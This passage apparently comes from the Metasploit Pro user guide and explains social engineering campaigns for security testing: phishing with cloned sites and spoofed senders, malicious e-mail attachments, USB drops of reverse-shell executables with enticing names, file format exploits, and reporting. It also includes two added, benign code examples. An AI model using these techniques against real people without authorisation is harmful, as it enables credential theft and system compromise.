• Campaign Redirect Page - Uses the redirect page that you create as part of the campaign. The redirect page must already exist for you to choose this option.

9. Click the Next button to continue to the Web Page Content window.
10. When the Web Page Content window appears, click the Template dropdown and choose the web template that you want to apply to the web page.
11. Click the Save button to save the web page.

Deleting a Web Template


1. From within a project, click the Campaigns tab.
2. Click the Manage Reusable Resources tab.
3. From the Resource dropdown, select Web Templates.
4. When the Web Templates page appears, select the web template that you want to delete.
5. Click the Delete button.
6. Click OK to confirm that you want to remove the template from the campaign.

E-mail Templates
An e-mail template defines a message or the HTML code that you can insert into an e-mail. An e-mail template contains optional HTML code that you can use to wrap the content of individual e-mail components. You should create an e-mail template for content that you want to reuse between campaigns that are within the same project, such as logos, banners, and footers. For example, you can create an e-mail template that contains a message that tells a victim to update their account information. The template content can contain a message like the following: "This is a friendly reminder to update your account passwords."

E-mail Templates

377

Or if you have a footer or logo that you want to reuse across multiple e-mails, you can create an e-mail template that contains the footer or banner information. So, when you create the e-mail, you can simply apply the e-mail template in order to insert the logos and banners that you need.

E-mail Template Example


Hi {{first_name}},

Our company prides itself in taking a proactive approach to security. We regularly perform routine checks to ensure that our employees' accounts are up to date with the strongest and most secure passwords.

{{email_content}}

Thank you for reading.

Sincerely,
Your IT team
<http://www.rapid7.com/img/global/logo.png>

E-mail Template Editors


Metasploit Pro provides an HTML and plain text editor for you to use to create content for the e-mail body.

• HTML Editor - The HTML editor is an editing interface that you use to create the content for an e-mail template. It includes a built-in toolbar for text formatting, which makes it possible for you to create e-mail content without any HTML knowledge.
• Text Editor - The text editor is an editing interface that you use to create the content for an e-mail template. Unlike the HTML editor, it does not include a formatting toolbar. Instead, you must have prior knowledge of HTML to create e-mail content.

E-mail Template Requirements


When you create the e-mail body for an e-mail template, it must contain the {{email_content}} attribute. This attribute inserts the e-mail body that you create in the actual e-mail component into the email. You cannot apply an e-mail template unless it contains the {{email_content}} attribute.
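The web template requirement ({{ web_page_content }}) and the e-mail template requirement ({{email_content}}) above are the same kind of check: a template is only saveable or applicable when it contains its content attribute. The following added example (not Metasploit Pro code) performs that check and shows how the attribute is replaced when a template wraps a component's content; the placeholder spellings come from the guide, while the helper names and the per-target field expansion for {{first_name}} are assumptions based on the e-mail template example.

```ruby
# Added example, not Metasploit Pro code: validate that a template contains
# its required content attribute, then wrap component content with it.

# Content attribute each template kind must contain (taken from the guide).
PLACEHOLDER = { web: 'web_page_content', email: 'email_content' }.freeze

# Matches {{ name }} with or without inner spaces, since the guide writes
# {{ web_page_content }} and {{email_content}}.
def placeholder_re(name)
  /\{\{\s*#{Regexp.escape(name)}\s*\}\}/
end

# True when the template body contains the attribute required for its kind.
def template_valid?(kind, body)
  body.match?(placeholder_re(PLACEHOLDER.fetch(kind)))
end

# Wraps component content in the template. Raises when the attribute is
# missing, mirroring the guide's "cannot save / cannot apply" rule. The block
# form of gsub is used so backslashes in the content are inserted literally.
def apply_template(kind, template, content)
  name = PLACEHOLDER.fetch(kind)
  raise ArgumentError, "template lacks {{#{name}}}" unless template_valid?(kind, template)

  template.gsub(placeholder_re(name)) { content }
end

# Expands per-target fields such as {{first_name}} (assumed to work like the
# e-mail template example). Unknown placeholders are left untouched so a
# missing field is visible rather than silently blanked.
def fill_target_fields(body, target)
  body.gsub(/\{\{\s*(\w+)\s*\}\}/) do |whole|
    target.fetch(Regexp.last_match(1).to_sym, whole)
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample: the guide's e-mail template shape with a short body.
  tmpl = "Hi {{first_name}},\n\n{{email_content}}\n\nSincerely,\nYour IT team\n"
  body = apply_template(:email, tmpl, 'Thank you for completing the awareness training.')
  puts fill_target_fields(body, { first_name: 'john', last_name: 'smith' })
end
```

Checking template_valid? at save time is what keeps a template from being stored in a state where it can never be applied; apply_template repeats the check so a template edited outside the UI is rejected with a clear error instead of producing a page or e-mail with the component content silently dropped.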

Creating an E-mail Template


1. From within a project, click the Campaigns tab.
2. Click the Manage Reusable Resources tab.
3. From the Resources dropdown, select E-mail Templates and click the New E-mail Template button.
4. When the New E-mail Templates page appears, enter a name for the template in the Name field.

5. Click the Insert Custom Attribute dropdown, and select the E-mail Content attribute.
6. Under the {{email_content}} attribute, enter the e-mail body for the template.
7. When you finish creating the e-mail content, click the Save button.

Deleting an E-mail Template


1. From within a project, click the Campaigns tab.
2. Click the Manage Reusable Resources tab.
3. From the Resource dropdown, select E-mail Templates.
4. When the E-mail Templates page appears, select the e-mail template that you want to delete.
5. Click the Delete button.
6. Click OK to confirm that you want to remove the template from the campaign.

Malicious Files
A malicious file refers to a custom, user supplied file that you can use in a campaign to exploit a target machine. Examples of a malicious file include custom written scripts, executables, or payloads. To deliver a malicious file to a human target, you must first upload the file to the project. Once the malicious file is uploaded, you can use either an e-mail or web page to deliver the malicious file to the human target. Each of these campaign components provides an option to attach a user supplied file to it.

Attaching a Malicious File to an E-mail


1. From within a project, click the Campaigns tab.
2. Click the Configure a Campaign tab.
3. In the Name field, enter a name for the campaign.
4. For the setup option, choose Custom Campaign.
5. Click the Add e-mail, web page, portable file button.
6. Click the E-mail button.
7. When the e-mail configuration window appears, enter a name for the e-mail component in the Component name field. This is the name that displays for the component on the campaign configuration page.
8. In the Subject field, enter a subject for the e-mail.
9. In the From address field, enter the e-mail address that the campaign is trying to spoof.
10. In the From name field, enter the name of the person that the spoofed e-mail should appear to be from.

Malicious Files

379

11. From the Choose a Target List dropdown, select the target list that you want to send the e-mail to.
12. From the Attack type dropdown, choose the Attach file option.
13. In the Attachment file name field, enter the name of the malicious file you want to deliver to a human target. The file name must include the file extension. For example, if you are attaching a PDF, the file name should include the PDF extension.
14. From the File generation type options, choose User supplied file.
15. From the Choose a file dropdown, select the malicious file that you want to attach to the e-mail. Please remember that you must upload the malicious file before you can access it through a campaign component. If the file that you want to use has not been uploaded, you can choose the Upload a new file option to upload the file that you want to use.
16. Click the Next button to create the e-mail body.
17. After you create the e-mail body, click the Save button to close the e-mail configuration window.
18. From the campaign configuration page, click the E-mail Server button. If you have a global SMTP server set up, you can click the Save button to validate and save the server settings. If you do not have a global SMTP server configured, you will need to provide the SMTP settings for your mail server. After you define the SMTP settings, you can click Save to validate the server settings and to close the e-mail server configuration window.
19. When the campaign configuration page appears, click the Save button to save the campaign or click the Launch Campaign button to start the campaign.

Serving a Malicious File through a Web Page


1. From within a project, click the Campaigns tab.
2. Click the Configure a Campaign tab.
3. When the new campaign configuration form appears, enter a name for the campaign in the Name field.
4. For the setup option, choose Custom Campaign.
5. Click the Add e-mail, web page, portable file button.
6. Click the Web Page button.
7. When the e-mail configuration window appears, enter the URL that you want the web page to use in the Path field. By default, Metasploit Pro uses the IP address of the Metasploit instance for the web page's domain; however, you can change this when you configure the settings for the web server.
8. In the Component name field, enter a name for the web page component. This is the name that displays for the component on the campaign configuration page.
9. From the Attack type dropdown, choose the Serve File option.

10. From the File generation type options, choose the User supplied file option.
11. From the Choose a file dropdown, select the malicious file that you want to attach to the e-mail. Please remember that you must upload the malicious file before you can access it through a campaign component. If the file that you want to use has not been uploaded, you can choose the Upload a new file option to upload the file that you want to use.
12. Click the Next button to create the web page content.
13. After you create the web page content, click the Save button to close the web page configuration window.
14. From the campaign configuration page, click the Web Server button.
15. When the web server configuration window appears, select the host name that you want to use to host the web page.
16. In the Listening Port field, enter a port that is commonly used for HTTP traffic, such as ports 80 or 8080.
17. Click the Save button to save your changes and to close the web server configuration window.
18. Now that you are back on the campaign configuration page, you need to create an e-mail to deliver the web page URL to the human targets.
19. From the Campaign Components area, click the Add e-mail, web page, portable file button.
20. Click the E-mail button.
21. When the e-mail configuration window appears, enter a name for the e-mail component in the Component name field. This is the name that displays for the component on the campaign configuration page.
22. In the Subject field, enter a subject for the e-mail.
23. In the From address field, enter the e-mail address that the campaign is trying to spoof.
24. In the From name field, enter the name of the person that the spoofed e-mail should appear to be from.
25. From the Choose a Target List dropdown, select the target list that you want to send the e-mail to.
26. From the Attack type dropdown, choose None.
27. Click the Next button to create the e-mail body.
28. After you create the e-mail body, click the Save button to close the e-mail configuration window.
29. From the campaign configuration page, click the E-mail Server button. If you have a global SMTP server set up, you can go ahead and click the Save button to validate and save the server settings. If you do not have a global SMTP server configured, you will need to provide the SMTP settings for your mail server.

30. After you define the SMTP settings, you can click Save to validate the server settings and to close the e-mail server configuration window.
31. When the campaign configuration page appears, click the Save button to save the campaign or click the Launch Campaign button to start the campaign.

USB Key Campaigns


USB key dropping is a social engineering tactic that can be used to obtain sensitive information or remote access to a human target's computer. A social engineer or penetration tester may want to leverage USB key drops to raise security awareness, ensure adherence to security procedures, and improve defense strategies within an organization. Typically, the attacker places a malicious file or executable onto the USB key and drops the key off in a high traffic area like the break room. If someone finds the key and installs the device on their system, the malicious file will run if the autorun feature is implemented, or it will run when the person clicks on the executable file. When the file runs, it delivers a payload that could potentially open a backdoor on the human target's machine. If a session successfully opens on a victim's machine, an attacker can take control of it to attack other machines on the network, capture data, and escalate privileges. To create a USB key drop, you need to set up a portable file campaign that contains an executable.

Executable Files
An executable is a portable file that delivers the embedded generic multi-handler payload to a victim's machine. The payload creates a reverse connection over HTTPS from the victim's machine to the multi-handler listener that is running from a campaign. When the multi-handler listener receives the incoming connection, it delivers the remaining payload to the victim's machine. After a connection has been established between the two machines, you can take control of the session to gain further access into the network or to gather information from the victim's machine. To set up the handler, you need to specify the listener port, or LPORT. Metasploit Pro uses the LPORT that you assign and the local Metasploit instance as the callback IP address to configure the handler.

Generating an Executable File


1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns page appears, click the Configure a Campaign tab.
3. When the campaign configuration form appears, enter a descriptive name for the campaign in the Name field. For example, USB-Payroll helps you easily identify the campaign type and the executable file name.
4. Select the Custom Campaign option.
5. Click the Add e-mail, web page, portable file button. A set of campaign components appears.
6. Click the Portable File button.
7. In the Component name field, enter a unique name for the portable file component. This name displays under the portable file icon on the campaign configuration page.
8. In the Generated file name field, enter a name for the executable file. This is the file name that the human target sees when they look at the contents of the USB drive. You want to give the file a name that entices the user to click on it. For example, a name like Payroll or Company Bonuses may work well.
9. In the Listener Host field, enter the callback IP address that you want the payload to use. By default, the callback IP is the address of your Metasploit server.
10. In the Listener Port field, enter the callback port that you want the payload to use. By default, the callback port is 1024.
11. Select the Payload type for the executable file.
12. Verify that Executable file is selected as the File generation type.
13. Save the executable.
14. When the Configure a Campaign area reappears, you will see a Download link located beneath the USB Key icon. Click the Download link and save the executable file to a location on your local machine. The Desktop or Downloads folder is a good location.
15. Click the Launch Campaign button to start the campaign. The campaign must be online in order for you to get a session on the human target's system.
16. Insert your USB key into your USB port and move the executable over to your USB drive. The USB key is now ready for you to drop off. You should select an area that has high traffic volume or a location where people are more likely to set things down and forget them, such as bathrooms, copy rooms, and break rooms. This increases the chances of someone finding the USB key and installing it on their system. If you are able to successfully create a backdoor on the victim's machine, you can use it to pivot to other machines on the network and collect information from the victim.

Downloading an Executable File


1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns page appears, find the campaign that contains the executable file that you want to download.
3. Click the Edit link. The campaign configuration page appears and displays the components that are part of the campaign.
4. Locate the component that contains the executable that you want to download.
5. Click the Download link.
6. Save the file to a location on your machine.


File Format Exploits


A file format exploit takes advantage of a vulnerability that exists in the way that an application processes data in a particular file format, such as PDF, DOC, or JPEG. Most file format exploits are malicious files that are delivered to a human target through e-mail or an external storage device, such as a USB key. A file format exploit enables you to create a single malicious file, such as a PDF, and use that file to compromise systems regardless of the operating system. A file format exploit runs when a human target opens the malicious file, and if their system is vulnerable to the exploit, you will be able to obtain shell access to their machine. For example, you can create a PDF that contains an exploit, like the Adobe CoolType exploit. When a vulnerable target opens the PDF, the payload runs and creates a session between the target's machine and the attacking machine.

Generating a File Format Exploit


1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns page appears, click the Configure a Campaign tab.
3. When the campaign configuration page appears, enter a descriptive name for the campaign in the Name field. For example, USB-Payroll helps you easily identify the campaign type and the executable file name. Select the Custom setup.
4. Click the Add e-mail, web page, portable file button. A set of buttons for campaign components appears.
5. Click the Portable File button.
6. Enter a unique name for the portable file component. This name displays under the portable file icon on the campaign configuration page.
7. Enter a name for the generated file. This is the file name that the human target sees when they look at the contents of the USB drive. For example, if you are generating a malicious PDF, you can specify a name like Corporate_Bonuses_2012.PDF or John_Smith_Resume.PDF.
8. Select File format exploit for the File generation type. A list of available file format exploits appears.
9. Use the search field to narrow down the list of exploits. For example, if you are searching for the Adobe CoolType exploit, you can search for name:cooltype. The keyword tag, name, specifies that you want to search for the keyword, cooltype, in the module's name.
10. When you find the exploit that you want to use, click on the module name. The module configuration page appears.
11. You can modify any of the exploit settings, such as the payload and connection type, but it is recommended that you use the default configuration for the exploit.
12. Click OK to apply the module configuration.
13. Save the file format exploit.
14. When the campaign configuration area reappears, you will see a Download link located below the campaign component icon. Click the Download link and save the file to a location on your local machine. The Desktop or Downloads folder is a good location.
15. When you are ready to start the campaign, click the Launch Campaign button. The campaign must be online in order for you to get a session on the human target's system.
16. Insert your USB key into your computer and move the file over to your USB drive. The USB key is now ready for you to drop off. You should select an area that has high traffic or a location where people are more likely to set things down and forget them, such as bathrooms, copy rooms, and break rooms.

Downloading a File Format Exploit


1. From within a project, click the Campaigns tab.
2. When the Manage Campaigns page appears, find the campaign that contains the file format exploit that you want to download.
3. Click the Edit link. The campaign configuration page appears and displays the components that are part of the campaign.
4. Locate the component that contains the file that you want to download.
5. Click the Download link located below the component.
6. Save the file to a location on your machine.


Phishing Campaigns
Phishing is a social engineering technique that attempts to acquire sensitive information from a human target. During a phishing attack, a human target receives an e-mail disguised as an e-mail from a trusted source. The spoofed e-mail contains a tracking link that opens an authentic looking web page, which contains a web form that you want the human target to fill out. If the human target fills out and submits the form, you can capture their information and use it as evidence. Phishing is a good way for you to test the following issues:
- The security perimeter, e-mail infrastructure, and client-side safety measures prevent unauthorized access and malicious activity.
- The security awareness and training programs effectively teach employees how to identify and prevent a phishing attack.

How a Phishing Campaign Works


When a phishing campaign starts, Metasploit Pro sends the e-mail to the target list through your mail transfer agent (MTA). The e-mail contains a tracking GIF that detects when a human target opens the e-mail. If the human target clicks on the link in the e-mail, the tracking GIF sets a cookie, or unique identifier, that enables the campaign to track the actions of the human target. The unique identifier prevents Metasploit Pro from capturing duplicate data for the same human target.

To serve the web page, Metasploit Pro starts a web server on your local system. The web server address is based on the local system's IP address or host name. If you have DNS set up, you can specify the domain name instead. For example, if you are running Metasploit Pro on 192.168.182.6, the human target will see the web page URL as 192.168.182.6/landing_page?d=uniquetrackingstring.

To create a phishing campaign, you can use either the Phishing Campaign or the custom campaign. If you intend to create a phishing attack that launches Browser Autopwn or serves an exploit, you need to use the custom campaign. Otherwise, you can use the Phishing Wizard to create a standard phishing attack with a landing page and redirect page.
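As an added example that is not part of this guide or of Metasploit Pro, the following Python script turns the campaign web server's access log into the funnel that the Social Engineering Campaign Details Report describes (sent, opened, clicked, submitted), collapsing repeated requests from the same unique tracking string and flagging the recipients who submitted the form. The landing path /landing_page follows the guide's URL example; the tracking GIF path /track.gif, the form POST back to the landing path, the Common Log Format and the sample log lines are assumptions constructed for the example.

```python
"""Social engineering funnel from campaign web-server access logs.

Added example; not Metasploit Pro code. Assumptions: the landing page is
served at /landing_page (as in the guide's URL example), the tracking GIF
is served at a hypothetical /track.gif, both carry the unique tracking
string in the ``d`` query parameter, and the landing-page form is POSTed
back to the same path. Log lines are in Common Log Format.
"""
import re
from urllib.parse import parse_qs, urlsplit

LANDING_PATH = "/landing_page"    # from the guide's example URL
TRACKING_GIF_PATH = "/track.gif"  # hypothetical path for the tracking GIF

# Funnel stages in order. Reaching a later stage implies the earlier ones,
# so a click still counts as an open when the mail client blocked the GIF.
STAGES = ("sent", "opened", "clicked", "submitted")

# Common Log Format: client ident user [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')


def parse_line(line):
    """Return the fields this analysis needs from one log line, or None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    client, method, target, status = m.groups()
    parts = urlsplit(target)
    tracking = parse_qs(parts.query).get("d", [None])[0]
    return {"client": client, "method": method, "path": parts.path,
            "status": int(status), "tracking": tracking}


def classify(event):
    """Map one parsed request to a funnel stage, or None if it is not one."""
    if event is None or event["tracking"] is None or event["status"] >= 400:
        return None
    if event["path"] == TRACKING_GIF_PATH and event["method"] == "GET":
        return "opened"
    if event["path"] == LANDING_PATH:
        return "submitted" if event["method"] == "POST" else "clicked"
    return None


def build_funnel(log_lines, targets):
    """Count the recipients that reached each stage.

    ``targets`` maps each unique tracking string to one recipient's e-mail
    address, so repeated requests from the same person collapse into a single
    entry per stage instead of inflating the counts.
    Returns (counts, high_risk_recipients, unknown_tracking_ids).
    """
    furthest = {}        # tracking string -> index of the deepest stage reached
    unknown_ids = set()  # tracking strings that match no recipient
    for line in log_lines:
        event = parse_line(line)
        stage = classify(event)
        if stage is None:
            continue
        tid = event["tracking"]
        if tid not in targets:
            unknown_ids.add(tid)  # forged or scanner traffic; not a recipient
            continue
        furthest[tid] = max(STAGES.index(stage), furthest.get(tid, 0))

    counts = {"sent": len(targets)}
    for depth, stage in enumerate(STAGES[1:], start=1):
        counts[stage] = sum(1 for reached in furthest.values() if reached >= depth)
    submitted = STAGES.index("submitted")
    high_risk = sorted(targets[tid] for tid, reached in furthest.items()
                       if reached == submitted)
    return counts, high_risk, unknown_ids


# Constructed sample data, not output from a real campaign.
SAMPLE_TARGETS = {
    "a1f3": "alice@example.com",
    "b7c2": "bob@example.com",
    "c9d8": "carol@example.com",
    "d4e5": "dave@example.com",
}

SAMPLE_LOG = """\
10.0.0.11 - - [21/Mar/2014:09:02:11 -0500] "GET /track.gif?d=a1f3 HTTP/1.1" 200 43
10.0.0.11 - - [21/Mar/2014:09:03:40 -0500] "GET /landing_page?d=a1f3 HTTP/1.1" 200 5120
10.0.0.11 - - [21/Mar/2014:09:04:05 -0500] "POST /landing_page?d=a1f3 HTTP/1.1" 302 0
10.0.0.11 - - [21/Mar/2014:09:04:09 -0500] "POST /landing_page?d=a1f3 HTTP/1.1" 302 0
10.0.0.23 - - [21/Mar/2014:09:10:01 -0500] "GET /landing_page?d=b7c2 HTTP/1.1" 200 5120
10.0.0.31 - - [21/Mar/2014:09:12:30 -0500] "GET /track.gif?d=c9d8 HTTP/1.1" 200 43
10.0.0.99 - - [21/Mar/2014:09:15:00 -0500] "GET /landing_page?d=zzzz HTTP/1.1" 200 5120
10.0.0.99 - - [21/Mar/2014:09:15:02 -0500] "GET /landing_page HTTP/1.1" 404 0
""".splitlines()

if __name__ == "__main__":
    counts, high_risk, unknown = build_funnel(SAMPLE_LOG, SAMPLE_TARGETS)
    for stage in STAGES:
        print(f"{stage:>9}: {counts[stage]}")
    print("high-risk recipients:", high_risk)
    print("unknown tracking ids:", sorted(unknown))
```

Bob never fetched the GIF but is still counted as having opened the mail because he clicked, which is why the funnel is computed from the deepest stage reached rather than from raw hits.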

Before You Create a Phishing Campaign


Before you create a phishing campaign, you need to perform the following tasks:
- Set up the global SMTP settings - To access the global settings, select Administration > Global Settings from the main menu. Find the SMTP settings and enter the information for your SMTP server.
- Verify that your local machine can reach the Internet - Metasploit Pro must be able to access the Internet in order to clone a web page.
- Create or import target lists - The target list defines the e-mail addresses of the human targets to whom you want to send the phishing e-mail. You can create the target list from within the Phishing Wizard, but it is recommended that you set up your target lists before you create a campaign.

Creating a Phishing Attack


Metasploit Pro provides a canned phishing campaign that you can use to create a phishing attack. The phishing campaign contains all the components that you need to set up a phishing attack as well as many default, canned settings that you can use to quickly get up and running. When you first access the canned phishing campaign, the campaign will contain a web page component called Landing Page, an e-mail component, an e-mail server, and a web server. A second web page component will be added after you configure the Landing Page if you opt to create a redirect web page rather than use a real web page. Each component is represented by a campaign button that provides access to the component's configuration forms. When you click on a campaign button, a modal window appears and shows you the fields and options that you can configure for the component. The modal window provides step-by-step guidance to show you how to configure the campaign component and validates the component before saving it.

Creating a Phishing Campaign


1. From within a project, click the Campaigns tab. The Manage Campaigns page appears.
2. Click the Configure a Campaign tab.
3. In the Name field, enter a descriptive name for the campaign. The name of the campaign should help you easily identify the campaign as a phishing campaign. For example, a name like HR Phishing Scam lets you know that the campaign is a phishing campaign that targets the HR team.
4. Select the Phishing Campaign as the set up option.

Setting Up a Landing Page


1. From the Campaign Components area, click the Landing Page button.
2. When the Web Page Configuration window appears, add the name of the landing page to the end of the URL path. This is the complete URL that the human target sees in their browser's address bar.
3. Choose one of the following options to select the redirect page:
   - Redirect to URL - Redirects the human target to a real web page. For example, you can redirect the human target back to the company's website or intranet.
   - Campaign Redirect Page - Uses the redirect page that you create as part of the campaign.
4. Click the Next button to continue to the Web Page Content window.
5. When the Web Page Content window appears, choose one of the following options to add HTML to the web page:
   - Create custom HTML - To create a custom web page, use the content editor to write the HTML for the web page.
   - Clone an existing website - This is the recommended method. To clone a website, click the Clone Website button. When the Clone Website modal window appears, enter the web page that you want to clone. The web page that you want to clone must contain some sort of web form.
6. Click the Save button to save the web page component.

Setting Up a Redirect Page


Skip this step if you are using a redirect URL instead of a campaign redirect page.
1. From the campaign configuration page, click the Redirect Page button.
2. When the Web Page Configuration window appears, add the name of the redirect page to the end of the URL path. This is the URL that the human target sees in their browser's address bar.
3. Click the Next button to continue to the Web Page Content window. The following steps are similar to the ones you just used to create the landing page.
4. When the Web Page Content window appears, choose one of the following options to add HTML to the web page:
   - Create custom HTML - To create a custom web page, use the content editor to write the HTML for the web page.
   - Clone an existing website - This is the recommended method. To clone a website, click the Clone Website button. When the Clone Website modal window appears, enter the web page that you want to clone. The web page that you want to clone must contain some sort of web form.
5. Click the Save button to save the web page component.

Crafting a Phishing E-mail


1. From the campaign configuration page, click the E-mail button.
2. When the e-mail configuration window appears, enter the following header information:
   - Subject - The subject that displays in the message header and the subject line.
   - From Address - The sender's e-mail address.
   - From Name - The sender's name.
3. Click the Target list dropdown and choose a target list.
4. Click Next to continue to the E-mail Content window.
5. When the E-mail Content window appears, you need to create the body for the e-mail. Use the plain text or rich text editor to create the e-mail body.
6. After you create the content, you need to add a link to the landing page. To do this, either highlight the text in the e-mail content that you want to use as the display text or place your cursor at the insertion point where you want the URL to appear in the e-mail.
7. Click the Insert Custom Attribute dropdown and select Link to Landing Page.
8. When the Insert a Landing Page window appears, enter the text that you want to display in the e-mail and click Insert. The link will appear as {% campaign_web_link 'DISPLAY TEXT', 'Landing' %} in the E-mail Content window.
9. Click Save to save the e-mail component.

Setting Up the Web Server


1. From the campaign configuration page, click the Web Server button.
2. When the Web Server Configuration window appears, choose one of the following options:
   - This server's IP address - Uses the IP address of the local machine.
   - This server's host name - Uses the host name of the local machine.
   - Custom - Uses the domain name, if DNS is set up and is reachable by the Metasploit instance.
3. In the Listening Port field, enter the port that you want to use to run the web server. You should specify a port that is typically used for HTTP traffic, such as 80 or 8080.
4. Click Save to save the web server settings.

Setting Up Local SMTP Settings for a Phishing Campaign


1. From the campaign configuration page, click the Email Server button.
2. When the Email Server Configuration window appears, define the following fields:
   - Host - The fully qualified mail server address (e.g., mail.domain.com).
   - Port - The port that SMTP runs on. Typically, SMTP runs on port 25.
   - Username - The user name that the system uses to authenticate to the mail server.
   - Password - The password that the system uses to authenticate to the mail server.
3. Click Save to save the e-mail server settings.

Sending an E-mail Alert


1. From the campaign configuration form, locate the Notifications area.
2. Select the Notify others before launching the campaign option.
3. When the Notification Settings window appears, enter the e-mail addresses of the people you want to send the alert to in the To field.
4. In the Subject field, enter the subject that you want the e-mail to display. By default, Metasploit Pro auto-fills the subject for you with a canned subject line.
5. In the Message field, enter the information, or body, that you want to send in the e-mail. For example, you may want to say something like: "This is a company-wide alert to inform you that we are starting our security awareness program. If you have any questions, please contact John Smith."
6. When you are done creating the notification e-mail, click the Save button.

Saving a Campaign
When you finish configuring the campaign components, you need to save the campaign.
- To save a campaign, click the Done button on the campaign configuration page.


Working with Sessions


After you distribute the executable or file format exploit, you will need to check Metasploit Pro for sessions. If someone has run the executable or file format exploit, you will see a session logged against the victim's machine. The session remains open until the victim powers off their computer or you manually terminate the session.

Checking for Open Sessions


All active and closed sessions are viewable from the Sessions area of the Metasploit UI. An active session indicates that you have a shell and can interact with the victim's machine. To check for open sessions:
- From the project that contains your campaign, select the Sessions tab from the Tasks bar. You will see a list of open sessions under the Active Sessions area. Click on any session ID to view the actions that you can take against the victim's system.

Cleaning Up Sessions
A session clean up closes the connection between the attacking machine and the victim and removes any artifacts from Metasploit Pro. You need to perform a session clean up to close sessions that you no longer need to access.
1. From the project that contains your campaign, select the Sessions tab from the Tasks bar. A list of open sessions appears under the Active Sessions area.
2. Select the sessions that you want to close and click the Clean Up button.


Social Engineering Report


The Social Engineering Campaign Details Report is a document that contains the comprehensive results and data for a particular campaign. It provides a detailed report of the findings that the campaign has collected and helps you organize your data to share with team members or across an organization. Like the other types of reports, the Campaign Details Report can be generated in easily distributable formats, such as PDF, Word, RTF, and HTML. From the Social Engineering Campaign Details Report, you can view the following types of information:
- A statistical overview of the campaign findings.
- Actions taken by the human targets in a campaign.
- Statistical analysis of human target behavior and easy identification of high-risk targets.
- Browser and operating systems used by human targets in a phishing attack.
- Raw data from the components used to create a campaign.
- Any exploits that were used in the campaign and any sessions that were obtained from compromised systems.
- Remediation steps that can be implemented or can be recommended to reduce the threat of social engineering attacks across an organization.

Social Engineering Report Sections


The Social Engineering Campaign Details Report is made up of several different sections that provide you with a detailed look at the different areas of the campaign. The following table shows the sections that the Social Engineering Campaign Details Report includes. The table has three columns: Included by Default, Included for Campaigns with Specific Components, and Included for Campaigns that Opened Sessions.

Sections (first part of the table): Cover Page, Executive Summary, Social Engineering Funnel, Exploits Used, Form Submissions, Browser/Platform Information, Appendix: Host Details
Included by Default: X X X
Included for Campaigns that Opened Sessions: X X X X

Sections (second part of the table): Appendix: Human Targets, Appendix: E-mails, Appendix: Web Pages, Appendix: Portable Files, Appendix: Remediation Advice, Appendix: Notes
Included for Campaigns with Specific Components: X X X X
Included for Campaigns that Opened Sessions: X X

Cover Page

Executive Summary

Social Engineering Funnel

Exploits Used

Form Submissions

Appendix: Human Target Details

Appendix: Campaign Components

Remediation Advice

Report Notes

Generating a Social Engineering Campaign Details Report


You can generate the report at any time, regardless of the campaign's current state. If the campaign's state is running, the report will include the latest information from the moment you generate it. To generate the Social Engineering Campaign Details Report:


1. From within a project, click the Reports tab.
2. Click the Standard Report button.
3. When the New Report form appears, click the Report type dropdown and choose Social Engineering Campaign Details Report.
4. From the SE Campaign Detail Report Format options, choose the format you want to use to generate the report. The most common format is PDF.
5. In the Name field, enter the name that you want to assign to the report. This is the name that displays on the Reports page in Metasploit Pro and the name that the system uses to save the report. You can choose to use the default naming convention, which uses the report type as the report name and appends the task number to it.
6. Click the Campaign dropdown menu and choose the campaign that you want to generate a report for.
7. From the Report Sections options, deselect any report sections that you do not want to include in the report. By default, all sections are included; however, if the campaign does not have any data for a particular section, the section will be empty in the report.
Note: If your campaign does not use an exploit or deliver a payload to the human target, your report will not show any data for the Exploits Used section or display any values for the % of systems exploited and compromised in the Social Engineering Funnel.
8. Select the Include web page HTML option if you want to include the raw HTML code for all the web page components that are part of the campaign.
9. If you want to e-mail the generated report, you can select the E-mail report option and enter a comma-separated list of the e-mail addresses that you want to send the report to.
Note: If you choose to e-mail the report, make sure that you have the SMTP settings configured through the Global Settings.
10. Click the Generate button to create the report. The Task Log appears and shows you the progress of the report generation.
11. When the report generation is complete, click the Reports tab to view a list of reports stored in the project.
12. Find the report you just generated. You can either view the report directly through your browser or you can download the report and save it to a location on your system.

Campaign Report Options


When you generate the Social Engineering Campaign Details report, there are several options that you can configure to customize the report.


Including the Raw HTML in the Report


Metasploit Pro automatically generates a preview of all web pages that are part of the campaign. An image preview of the web page will render in the report if the web page was used as part of a phishing campaign. If a web page was used to deliver malicious code, such as client-side exploits, Java applets, Browser Autopwn, or executable files, a preview will not display in the report. If you want to include the raw HTML that was used to create a web page, you can select the Include web page HTML option on the New Report form. When you enable this option, the raw code will be displayed under each web page preview in the report.

Including and Excluding Report Sections


By default, the Social Engineering Campaign Details Report includes all sections that are available for the report. However, only sections that are applicable to the campaign will have data present in the report. If a section does not have any data for Metasploit Pro to report on, then the section will be empty in the report. For example, if you choose to include the Exploits Used section in your report, but the campaign does not deliver a payload and does not successfully open a session, you will not see any data in the section. To include or exclude sections from your report, find the Report Sections area on the New Report form. You will see a list of all the sections that are available in the report, such as the Executive Summary, Social Engineering Funnel, Exploits Used, and Form Submission sections, as well as appendices for the report. Any sections that have a marked check box will automatically be included in the report. To remove any sections, deselect the check box.

E-mailing the Generated Report


Metasploit Pro enables you to automatically e-mail a report after it is generated. To e-mail a report, you need to enable the E-mail report option on the New Report form and specify the e-mails that you want to send the report to. The e-mails that you specify must be comma separated. Additionally, before you can e-mail a report, you need to set up the SMTP settings through the Global Settings. If you already have an existing global SMTP server for your campaigns, then Metasploit Pro will just use that mail server to send the e-mails. If you do not have a global SMTP server set up, go to Administration > Global Settings > SMTP Settings. You will need to provide Metasploit Pro with the information for your mail server. This information includes the credentials that Metasploit Pro will need to authenticate to the mail server and the domain and SMTP port information for the mail server.

Naming the Report


By default, Metasploit Pro uses a naming convention that uses the report type and the task number to name the report. You can change the name by replacing the default name in the Report Name field on the New Report form.


Chapter 18: Task Chains

To learn more about task chains, read the following topics:
- Creating, Scheduling, and Running Task Chains
- Managing and Editing Task Chains

About Task Chains


